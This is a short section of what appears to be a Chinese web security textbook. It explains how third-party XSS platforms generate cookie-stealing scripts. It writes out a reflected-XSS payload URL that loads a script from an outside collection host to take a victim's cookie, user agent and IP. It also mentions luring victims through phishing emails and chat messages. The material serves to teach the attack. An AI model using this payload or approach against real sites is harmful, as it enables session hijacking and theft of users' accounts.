4.1.3 XSS平台简介

目前市面上有大量的XSS平台,自动生成js攻击载荷,大大减小了攻击难度,主要步骤如下:

·注册XSS平台账户;

·获得XSS攻击代码,主要功能是获取用户cookie、ua、ip等信息:


http://webxss.top/xss/9C6YSs?1483513692

·结合XSS漏洞构造恶意链接:


http://testdomain.com/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case01-Tag2HtmlPageScope.jsp?userinput=<script%20src="http://webxss.top/xss/9C6YSs?148092496"></script>

恶意代码将注入到回显页面中,当用户访问该页面时,恶意代码将执行,受害者在testdomain.com下的cookie将被获取,黑客随即可获得受害者在这个域下的权限,见图4-5。比较常见的做法是通过钓鱼邮件、im消息等方式诱骗受害者点击。

图4-5 XSS平台上记录获取的信息